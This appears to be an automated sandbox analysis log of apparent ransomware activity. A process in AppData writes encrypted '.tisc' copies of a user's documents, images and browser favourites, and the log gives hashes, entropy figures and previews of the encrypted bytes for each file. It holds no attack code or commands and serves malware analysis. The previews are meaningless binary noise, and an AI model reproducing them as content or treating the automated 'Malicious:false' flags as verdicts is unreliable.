                                                                                    Preview: .,..T..H.9......l.Wo.~.=...r.c.../.yAF...Y.~.:-6.L....ro.....4H#...%..b.\*..........r~...m`..*.BF.&}".^.....cb64..\..w.*GZ....'......*.w.*..w..F}0.@.E...>]...^...f.o.m?.Uq.t.{..z.7.U.HE6.[..BI..QS.gA0.5...XI.....2........8S..I.u.."..Aiu.{{-..&......&.9...Y>.1.u)v{Dt..T..5..l>.|.{m...x...x.]....w......'...MM..L.f..u5.....h..Y......n}.o(..d....f......Lh.....#xC.C.".9.u..b.O.......}J'..-.g/...s..^...EK.<Yn.J...`......D.9m.......)j[#..vq}.....$)J.v..(...EQ...6.U......gvq1..^X=.FH..y4'.h.%|J.k@1L.....u....k...F.,.... .........H......I...'..o...X.Z..~:.Ut@....'...e..w.m....Q..C..$.V2..6..P.V.=......7P..<....hi......8...C%.....9..Z]u....`.W.0g.=....}b..T......A .....J*.W.J~N.NM.W.`..h;.J..8..#.......-.Yk....&.N...<vj...6.e..l..."=/^.1,7./.....{...Y@.Nx..2...n.A..ni..GF.8#...h9d.:.."..d.....a.).\U..x./.......J...W.\.rv.../pd...{....G.$z....I.3....^.l.u.../.%...A.P].Pjws...ur.........@...^.....Fmtu...?mK..31;.c....?.iU.<.n.z.:....}yz7]v....O..8=...
                                                                                    C:\Users\user\Downloads\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852146945353076
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:pzZht3JSMFSK3seR84dTLYQNe/P1wzw1nTIhb/RIBqrgaS62JBszz4llgbD:/hBJ9FZ31La/uM1nMBaBYOBSz42D
                                                                                    MD5:BA249DE0E160123286C07C85FEE86015
                                                                                    SHA1:724E4981C775ED4729D630154A182827E11B9AAE
                                                                                    SHA-256:5A121A289543DFC0CD3E7D8B4925E9FFC9D6807D60CF944B5D45962A981F2A32
                                                                                    SHA-512:826428C3459DA50E6E760D89F0DC24097196A0ED3A7604138A6FEE503234F8D1F5283C8D376003A1D6C45FD355E027CF55ECA9BEA631DA0FD2702B16961EDF71
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......'z/.b.5.^{r1..B....._.....A..X.T%.^bS.kg..g.QA.....N..I2.b4^.....>.k..;......X..9.z.1..3.s...r..uIR.-.............ht.........8..7|g...!c..$.'..[.Y>...[..K.. ..x.....&..hI[...2=.....B.]Ta....^...!..z.A..Au....CG....].Kr.c....LM.pF..2..3.A....dj........=....C..{lB...%...4..*.+..<.z.....6..h..K......&..C.0.o......9.h..,...h....W.X...gA.W.*91....u5......._u..~..5Y..a.l....N..}..V@rRR.EG...`..bT.....HD...}...W.J..Jn<.R...D.,..........9u2..S.3Jj.u....|............!G.%.=.....:..5.qb.~..s...T.......^QKU...`\..{->...r.Y.bp.A.|G...RW.........'i.................gR.l.c..5..o....}..Rh.u.....uJ'..f...z.VEL+...<.........d.%Oc.....4..\......[...x.......$.<..}.P.....la...]...G.l.TW..W...L.:...!.e.2..p..(.*.k..u...V....l.._l..H}...<p.y..?.@...yh..#..AQ......r...b.g....=.......=.e.Z..t...g..#.o....r...~..B.J..2[cW...0).4c@..L.......;.......t?.o..v.q..?q...9.......\G...w$...&.*.;,..x9O5~....A.f:K..c.w.,u..!.<@6..l.......;..(...?.rh....k
                                                                                    C:\Users\user\Downloads\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852146945353076
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:pzZht3JSMFSK3seR84dTLYQNe/P1wzw1nTIhb/RIBqrgaS62JBszz4llgbD:/hBJ9FZ31La/uM1nMBaBYOBSz42D
                                                                                    MD5:BA249DE0E160123286C07C85FEE86015
                                                                                    SHA1:724E4981C775ED4729D630154A182827E11B9AAE
                                                                                    SHA-256:5A121A289543DFC0CD3E7D8B4925E9FFC9D6807D60CF944B5D45962A981F2A32
                                                                                    SHA-512:826428C3459DA50E6E760D89F0DC24097196A0ED3A7604138A6FEE503234F8D1F5283C8D376003A1D6C45FD355E027CF55ECA9BEA631DA0FD2702B16961EDF71
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......'z/.b.5.^{r1..B....._.....A..X.T%.^bS.kg..g.QA.....N..I2.b4^.....>.k..;......X..9.z.1..3.s...r..uIR.-.............ht.........8..7|g...!c..$.'..[.Y>...[..K.. ..x.....&..hI[...2=.....B.]Ta....^...!..z.A..Au....CG....].Kr.c....LM.pF..2..3.A....dj........=....C..{lB...%...4..*.+..<.z.....6..h..K......&..C.0.o......9.h..,...h....W.X...gA.W.*91....u5......._u..~..5Y..a.l....N..}..V@rRR.EG...`..bT.....HD...}...W.J..Jn<.R...D.,..........9u2..S.3Jj.u....|............!G.%.=.....:..5.qb.~..s...T.......^QKU...`\..{->...r.Y.bp.A.|G...RW.........'i.................gR.l.c..5..o....}..Rh.u.....uJ'..f...z.VEL+...<.........d.%Oc.....4..\......[...x.......$.<..}.P.....la...]...G.l.TW..W...L.:...!.e.2..p..(.*.k..u...V....l.._l..H}...<p.y..?.@...yh..#..AQ......r...b.g....=.......=.e.Z..t...g..#.o....r...~..B.J..2[cW...0).4c@..L.......;.......t?.o..v.q..?q...9.......\G...w$...&.*.;,..x9O5~....A.f:K..c.w.,u..!.<@6..l.......;..(...?.rh....k
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852571256514355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ftmmMndcbhVU6pMV7MircCNAUEf8nazH+uHm4XXG9X+wmgFmwSFnpEioXXgbD:F5+dc/U6pIwiF2Ue8nOGI28Jfwando6D
                                                                                    MD5:44E5514BC040292C241E398DDD00ED92
                                                                                    SHA1:F0298FCB37AC56A0844662B6648AB2E903CA33AD
                                                                                    SHA-256:B666AE8057FB6AF444056038777A6CDE0F1874DDC6BAB321AF9370DAEB43242B
                                                                                    SHA-512:41DBB0030FAD99B6C0D3EDAE21A345260D375C3A59FA119B5856B01CB7058828561192930AC57F23E43BD61CA9F13C359BD3839C5563120D6F0CFF1D3235E44C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.%N...X0.........Ed..,.J....U.]g..u..&*.......Mc.2C.n...x..%^.d|....]?.5Pu...;l...#..t.......++}.b;..lU....?=~h.&...).....v..{.......W...q.!.o.+.t.0.U..?.NKs.A.6...-.x.{|.)q0........kJ+.E^~........J.M..(.M..~..w.<...?._..Y.".;.ja1j..,......9...G.9..Y.....$.W..9..1....M...W.RV..S ..V...5.....TY.o...}.8.lLP...a....Ju..Ab. Nm...B.K`[N.&..v...[5h..v......p?...|h.b.j.1.&..>^ w.<8T.y#...Y..%_...p....~..M.N..1.A.........4.)a..p.y..n.wr^Oq.).BZe./aS4.u I...pP.4d..(.q.).g.....pA..7-....>?IK..JGFmEa......bW...f..k.....vN0..M..\..ru.-...>....b.6...eq.#..=.X.?`....]'Vsm2i.cD.4...w....H.d. \.2^$D.V@.Q.g.....'..H.ZI.......+.....u.Vm#:.2!Xp..1.K....q..;.......C....6....6I.^.....'/..A/...../6.F..X.!......$2...\.2.-...c....l.h.X(.W.. f-.q....$7.%EP&f9o.=.).k~.!..l..iB..b..v.g..q.n...g..AH...Z...xy.e..`.:......,EP..7F...*...X..F....=].PqEX{|..T......;...#5#$..[CQ.$E....TN.g..z...\W<b.....A...q.E....u...)..w...-p..]...;.Y.[....4....K..\........l.<K..D(..Q......uh..Z
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852571256514355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ftmmMndcbhVU6pMV7MircCNAUEf8nazH+uHm4XXG9X+wmgFmwSFnpEioXXgbD:F5+dc/U6pIwiF2Ue8nOGI28Jfwando6D
                                                                                    MD5:44E5514BC040292C241E398DDD00ED92
                                                                                    SHA1:F0298FCB37AC56A0844662B6648AB2E903CA33AD
                                                                                    SHA-256:B666AE8057FB6AF444056038777A6CDE0F1874DDC6BAB321AF9370DAEB43242B
                                                                                    SHA-512:41DBB0030FAD99B6C0D3EDAE21A345260D375C3A59FA119B5856B01CB7058828561192930AC57F23E43BD61CA9F13C359BD3839C5563120D6F0CFF1D3235E44C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.%N...X0.........Ed..,.J....U.]g..u..&*.......Mc.2C.n...x..%^.d|....]?.5Pu...;l...#..t.......++}.b;..lU....?=~h.&...).....v..{.......W...q.!.o.+.t.0.U..?.NKs.A.6...-.x.{|.)q0........kJ+.E^~........J.M..(.M..~..w.<...?._..Y.".;.ja1j..,......9...G.9..Y.....$.W..9..1....M...W.RV..S ..V...5.....TY.o...}.8.lLP...a....Ju..Ab. Nm...B.K`[N.&..v...[5h..v......p?...|h.b.j.1.&..>^ w.<8T.y#...Y..%_...p....~..M.N..1.A.........4.)a..p.y..n.wr^Oq.).BZe./aS4.u I...pP.4d..(.q.).g.....pA..7-....>?IK..JGFmEa......bW...f..k.....vN0..M..\..ru.-...>....b.6...eq.#..=.X.?`....]'Vsm2i.cD.4...w....H.d. \.2^$D.V@.Q.g.....'..H.ZI.......+.....u.Vm#:.2!Xp..1.K....q..;.......C....6....6I.^.....'/..A/...../6.F..X.!......$2...\.2.-...c....l.h.X(.W.. f-.q....$7.%EP&f9o.=.).k~.!..l..iB..b..v.g..q.n...g..AH...Z...xy.e..`.:......,EP..7F...*...X..F....=].PqEX{|..T......;...#5#$..[CQ.$E....TN.g..z...\W<b.....A...q.E....u...)..w...-p..]...;.Y.[....4....K..\........l.<K..D(..Q......uh..Z
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854940243644631
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4f0Xb59p4SfcQ/KDmBZll34pMp1d9qTM/RqWYumSXT1pFhXsQERuY2Kvrt6qlL0J:4fLQcQ/maZaMd9qT6RrhDlN5Y8q9+D
                                                                                    MD5:46D89608E7547D62F7E26D4ACA38CA2E
                                                                                    SHA1:E758B931EE522B4916A9AA4C6C282B3566AFADDE
                                                                                    SHA-256:143BEE9BAFB5A02128774BFA0F6F0E4A174F26557F11E2B377A9873A51AC1B8A
                                                                                    SHA-512:4BB2A444FA4401DD2996861CF39FDB5F9F28E9886A5D919BE29614A001A45DF5C671DE36CC44E6416273E1870A734D08D452C639647604CE4CD9EEAE04A911A8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..z...V`.u.7..$p...vj.~l..<2B..8p..l..o....inF.: .%......{......^..............zt.[.v....`...>...3!L..g#......#.`>3.s.2.....>...[!..(.xl..2.L.4!...M..n5..1.L^Q8..M&.....L..B08.*.{.5...yD...d."..0.....N.....Wt.J./[....m..0...#...c....k.'.u....:4..jsy.0="Pp+-..m.......%...J.P\"e....[...S..}.V.........`..|s/.2o:60.ol...*..G....y.......2_3...L.. ....*....I..Q".....j.....W.....o.kE;B.q8..m...Y.tQ..-;.".n..}~...Rpg...X.v..l:.!2..E:.m;>...b.....!=...A........j.UP.X..h..U..zT........y....mK}.....*2^q:B+.h.....,..|._4....TO...0.a....1.Bd..O..."J.r............y...rZ.4..9.i...`_.....H......uN0...3..,x.Xg...4.Q3Mh.._...R...*r.......V.....o.G....1.B2....E9O..}...M.g...<.L$d.R.v...>...v....!.%...M........j...Ne|.,..%.3r..71........F..9.z.........3c..q`....l..... ....N...^...:.f...bDq...X.Q..x..-S1..pq..H.t<...r..Qj*.......$.|./^K^.R...6.u..#......y.|"\G.46.......$}.2f.a.Bs....-x.g........K.S.)..|...U{.&..5B.....x`....t.C.-.......TX.-...ZTJ....U..F....n
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854940243644631
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4f0Xb59p4SfcQ/KDmBZll34pMp1d9qTM/RqWYumSXT1pFhXsQERuY2Kvrt6qlL0J:4fLQcQ/maZaMd9qT6RrhDlN5Y8q9+D
                                                                                    MD5:46D89608E7547D62F7E26D4ACA38CA2E
                                                                                    SHA1:E758B931EE522B4916A9AA4C6C282B3566AFADDE
                                                                                    SHA-256:143BEE9BAFB5A02128774BFA0F6F0E4A174F26557F11E2B377A9873A51AC1B8A
                                                                                    SHA-512:4BB2A444FA4401DD2996861CF39FDB5F9F28E9886A5D919BE29614A001A45DF5C671DE36CC44E6416273E1870A734D08D452C639647604CE4CD9EEAE04A911A8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..z...V`.u.7..$p...vj.~l..<2B..8p..l..o....inF.: .%......{......^..............zt.[.v....`...>...3!L..g#......#.`>3.s.2.....>...[!..(.xl..2.L.4!...M..n5..1.L^Q8..M&.....L..B08.*.{.5...yD...d."..0.....N.....Wt.J./[....m..0...#...c....k.'.u....:4..jsy.0="Pp+-..m.......%...J.P\"e....[...S..}.V.........`..|s/.2o:60.ol...*..G....y.......2_3...L.. ....*....I..Q".....j.....W.....o.kE;B.q8..m...Y.tQ..-;.".n..}~...Rpg...X.v..l:.!2..E:.m;>...b.....!=...A........j.UP.X..h..U..zT........y....mK}.....*2^q:B+.h.....,..|._4....TO...0.a....1.Bd..O..."J.r............y...rZ.4..9.i...`_.....H......uN0...3..,x.Xg...4.Q3Mh.._...R...*r.......V.....o.G....1.B2....E9O..}...M.g...<.L$d.R.v...>...v....!.%...M........j...Ne|.,..%.3r..71........F..9.z.........3c..q`....l..... ....N...^...:.f...bDq...X.Q..x..-S1..pq..H.t<...r..Qj*.......$.|./^K^.R...6.u..#......y.|"\G.46.......$}.2f.a.Bs....-x.g........K.S.)..|...U{.&..5B.....x`....t.C.-.......TX.-...ZTJ....U..F....n
                                                                                    C:\Users\user\Favorites\Amazon.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.421862882130854
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:O7tpBbAV8WOrNKwl4QjkN7YNiKPIcii9a:IO8dZKwl44COgbD
                                                                                    MD5:BEDD69DA7C0639D2ABD9287FBBE7E2DE
                                                                                    SHA1:C053C42B6C43852A0A4687245F564C47E47BF273
                                                                                    SHA-256:9BB53C2190E5B8A15304914DBB4C3541081C4F855234D55E4D6063FB398911AC
                                                                                    SHA-512:443B2C023A8B526FA49274E030ECEA69B2CF37D0FCB6A56DC90F16586E9FA14605D2A01DF399AB3C10BDA4058ECFB1A6A7242CC8C81620306C50C537E40463D9
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....Q`.x+.e.6....9.0.R....y.t.|...L....M3v.....0...O.....|X.&.....q..:Uhdl...n......:...j...C2.-.s........a.9 b.....|.b.U......#Ru.L..%.._E..._.....1.z....|.U..a.T...sY....u~.../...........F.W9..Su.6>.V.U{...[...g......=!..Z3.3.gEA...p@....:....I..8.]...g.%.?.........c.h....y..m......0.f..)......~T..f..c&9+.N/6M.%... .....j.U..k.6aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Amazon.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.421862882130854
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:O7tpBbAV8WOrNKwl4QjkN7YNiKPIcii9a:IO8dZKwl44COgbD
                                                                                    MD5:BEDD69DA7C0639D2ABD9287FBBE7E2DE
                                                                                    SHA1:C053C42B6C43852A0A4687245F564C47E47BF273
                                                                                    SHA-256:9BB53C2190E5B8A15304914DBB4C3541081C4F855234D55E4D6063FB398911AC
                                                                                    SHA-512:443B2C023A8B526FA49274E030ECEA69B2CF37D0FCB6A56DC90F16586E9FA14605D2A01DF399AB3C10BDA4058ECFB1A6A7242CC8C81620306C50C537E40463D9
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....Q`.x+.e.6....9.0.R....y.t.|...L....M3v.....0...O.....|X.&.....q..:Uhdl...n......:...j...C2.-.s........a.9 b.....|.b.U......#Ru.L..%.._E..._.....1.z....|.U..a.T...sY....u~.../...........F.W9..Su.6>.V.U{...[...g......=!..Z3.3.gEA...p@....:....I..8.]...g.%.?.........c.h....y..m......0.f..)......~T..f..c&9+.N/6M.%... .....j.U..k.6aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Bing.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):537
                                                                                    Entropy (8bit):7.546381260833125
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:o0IQ212xwJ72oDyx6yRcLAFgMloEpoDEo6AiORR0T5eS3KPIcii9a:/I50w1DyUCxFvNp/PXObY5v3KgbD
                                                                                    MD5:2C77DB97116BC726C7E68D3E48640DC8
                                                                                    SHA1:63E4298151DD16EB1C614E9C32EA9B8A76387F81
                                                                                    SHA-256:9AF3CD12C1A3FD1A98F1F4B34310FCB02CF76385BA23C47261A6BC67138088D4
                                                                                    SHA-512:507B6A3FDB68D77AD4B56C521614A680A7648A190C9A73FCD9B159907848D8C857280023CA16025D86366570AF01638A15DE81B01757C2A676857A1F30572912
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...L..-..CvO...&...A....i.....I...Bc..L.uT...O"xT...D.7S..K.R...1^F.S.A.2.V.....^..&.TU.,.t.fH.......[F.....\.ks.o..T..x............w.m.3.g.0.YH...s4...?..~.hXT.....e........K;i.....#..G..wK...m.Qr...........,.....\.(....%..8P....>..>#a.ulU....^..,..X..<.c!.....M.Q..Z#....c$GtVS..s2B...[P3....yu.........ySp..`.w:Q_.m...q,..S..1.......D~.......3\w.u"....UL..C...=..r...}...nFG..T..5z..X...a8..y..L...A....._@ .U..Q.=2.n.\j.mP..4.z..0..5.~aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Bing.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):537
                                                                                    Entropy (8bit):7.546381260833125
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:o0IQ212xwJ72oDyx6yRcLAFgMloEpoDEo6AiORR0T5eS3KPIcii9a:/I50w1DyUCxFvNp/PXObY5v3KgbD
                                                                                    MD5:2C77DB97116BC726C7E68D3E48640DC8
                                                                                    SHA1:63E4298151DD16EB1C614E9C32EA9B8A76387F81
                                                                                    SHA-256:9AF3CD12C1A3FD1A98F1F4B34310FCB02CF76385BA23C47261A6BC67138088D4
                                                                                    SHA-512:507B6A3FDB68D77AD4B56C521614A680A7648A190C9A73FCD9B159907848D8C857280023CA16025D86366570AF01638A15DE81B01757C2A676857A1F30572912
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...L..-..CvO...&...A....i.....I...Bc..L.uT...O"xT...D.7S..K.R...1^F.S.A.2.V.....^..&.TU.,.t.fH.......[F.....\.ks.o..T..x............w.m.3.g.0.YH...s4...?..~.hXT.....e........K;i.....#..G..wK...m.Qr...........,.....\.(....%..8P....>..>#a.ulU....^..,..X..<.c!.....M.Q..Z#....c$GtVS..s2B...[P3....yu.........ySp..`.w:Q_.m...q,..S..1.......D~.......3\w.u"....UL..C...=..r...}...nFG..T..5z..X...a8..y..L...A....._@ .U..Q.=2.n.\j.mP..4.z..0..5.~aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Facebook.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):442
                                                                                    Entropy (8bit):7.444300898197649
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:2H/7qcRxhW8sUBkho+RzWFcQxhoJ3sK+FdYVLpDlObjlffyDAUfAPJFNob9LDjHy:S/7vhHBkOv3aCfawbjNyDAjvGPIcii9a
                                                                                    MD5:9421DC8ECC86D81BCEDD3FF9A428263F
                                                                                    SHA1:DD46089CF69FBAFD49DE260B960780974124247E
                                                                                    SHA-256:6BC42B8B37C53FBF2DC3E7B291AD2CA9D867B6837AA8950148A8F33705326185
                                                                                    SHA-512:64F3D8FE1EEF3347A945D3AE3828BB424CB87F603E670B03B7C522449DE79885282BA35760120FCBCF4327366001B26D88F99100F81CF6F97A2473AF57B8D961
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: !.$m.Sn...".aK......\.(.=.spXO.......h....Lh.x,[.j..T.>l...c.........\:'9...j....Qa.....H6.;,.......Qi.3[.....s.$..`....T.[.W..C..9..2T.@.R.:.u....E?2.."\...6Xv..W{}.#..\.spX..c...K.%Vr..h.\2C...>.&P@...........7...K..K./..|.2.y0n.G.v3.P...rtW<.9..3k>&i...N.4...e...TI.:...&+.D...i.VP.b.vC.......p.)..b.....c..s..,.]....Y|_O6..K.[0..R...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Facebook.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):442
                                                                                    Entropy (8bit):7.444300898197649
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:2H/7qcRxhW8sUBkho+RzWFcQxhoJ3sK+FdYVLpDlObjlffyDAUfAPJFNob9LDjHy:S/7vhHBkOv3aCfawbjNyDAjvGPIcii9a
                                                                                    MD5:9421DC8ECC86D81BCEDD3FF9A428263F
                                                                                    SHA1:DD46089CF69FBAFD49DE260B960780974124247E
                                                                                    SHA-256:6BC42B8B37C53FBF2DC3E7B291AD2CA9D867B6837AA8950148A8F33705326185
                                                                                    SHA-512:64F3D8FE1EEF3347A945D3AE3828BB424CB87F603E670B03B7C522449DE79885282BA35760120FCBCF4327366001B26D88F99100F81CF6F97A2473AF57B8D961
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: !.$m.Sn...".aK......\.(.=.spXO.......h....Lh.x,[.j..T.>l...c.........\:'9...j....Qa.....H6.;,.......Qi.3[.....s.$..`....T.[.W..C..9..2T.@.R.:.u....E?2.."\...6Xv..W{}.#..\.spX..c...K.%Vr..h.\2C...>.&P@...........7...K..K./..|.2.y0n.G.v3.P...rtW<.9..3k>&i...N.4...e...TI.:...&+.D...i.VP.b.vC.......p.)..b.....c..s..,.]....Y|_O6..K.[0..R...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Google.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.4037460082936315
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:mYwpSJ3b5QAyejG9NzLSxPEyX3dg5GdNX3GPIcii9a:mYESJr5QDeANzmxp9jdNXWgbD
                                                                                    MD5:ED3B155117D9C06E842A43FA47527893
                                                                                    SHA1:02386E8CA8153B54C23CBEC80D98618557EE5F1F
                                                                                    SHA-256:7D6F72AD4BC7E5478C0D07F39E250CE36693811DA92D8ACE145EC37063881DF8
                                                                                    SHA-512:511F3B50F92B5E75E1E62BA83C210A5BD4189750DE6C7C4BA362B97F82B00EA7BD1A34A0A71860EEFFB782EEB9E42AFEE79BF3613347D32D8100494836AC20C4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...3....?.@.OV.yS.1.G6.......:mb.......4...9H.UD&..g+..&.D..17y.A.MK.........]C..t..J..D...R.)+]..M~.X%.....N.66...0....,...n.....<.Q.Uw.c~.MO...hf..tN..k.0.`8.,..{.g..w...+jc7..|h..N...........>T.|..2_...X..*.../P.(-..EA...6...d...;.T..W... .f.N....<...fr.=..T..).1.M2yP.f....G.Rt...V..{...W.7....gJ)..IO..H|...D...V.5'.y...(...6)o.s.C#.Ff......'...//aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Google.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.4037460082936315
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:mYwpSJ3b5QAyejG9NzLSxPEyX3dg5GdNX3GPIcii9a:mYESJr5QDeANzmxp9jdNXWgbD
                                                                                    MD5:ED3B155117D9C06E842A43FA47527893
                                                                                    SHA1:02386E8CA8153B54C23CBEC80D98618557EE5F1F
                                                                                    SHA-256:7D6F72AD4BC7E5478C0D07F39E250CE36693811DA92D8ACE145EC37063881DF8
                                                                                    SHA-512:511F3B50F92B5E75E1E62BA83C210A5BD4189750DE6C7C4BA362B97F82B00EA7BD1A34A0A71860EEFFB782EEB9E42AFEE79BF3613347D32D8100494836AC20C4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...3....?.@.OV.yS.1.G6.......:mb.......4...9H.UD&..g+..&.D..17y.A.MK.........]C..t..J..D...R.)+]..M~.X%.....N.66...0....,...n.....<.Q.Uw.c~.MO...hf..tN..k.0.`8.,..{.g..w...+jc7..|h..N...........>T.|..2_...X..*.../P.(-..EA...6...d...;.T..W... .f.N....<...fr.=..T..).1.M2yP.f....G.Rt...V..{...W.7....gJ)..IO..H|...D...V.5'.y...(...6)o.s.C#.Ff......'...//aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Live.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):438
                                                                                    Entropy (8bit):7.4227076172394035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:aSD5u3Z5wUMX+xOXKekdAKV9xhXhEdBy0LsDJqaPIcii9a:aSD5GEUI+xTd9DxhxWrsDJqagbD
                                                                                    MD5:FB770C0C612EF5A5D928392E1C21C504
                                                                                    SHA1:A81582C459B1AABD82ACB4B286B2363DF12023E0
                                                                                    SHA-256:43FAFF46BBCD785C048264571061BC14D290450E0FC54841FB49A9255A717382
                                                                                    SHA-512:1F3220A94D1AF16700D59D54619C39970852B1BC41B01D1C619C10904BC28BABAB00D0C1D9FB2BD1F78E439AE66E1778AFDB1D4DF4FDB30690AD77D6EC0D2415
                                                                                    Malicious:false
                                                                                    Reputation:unknown
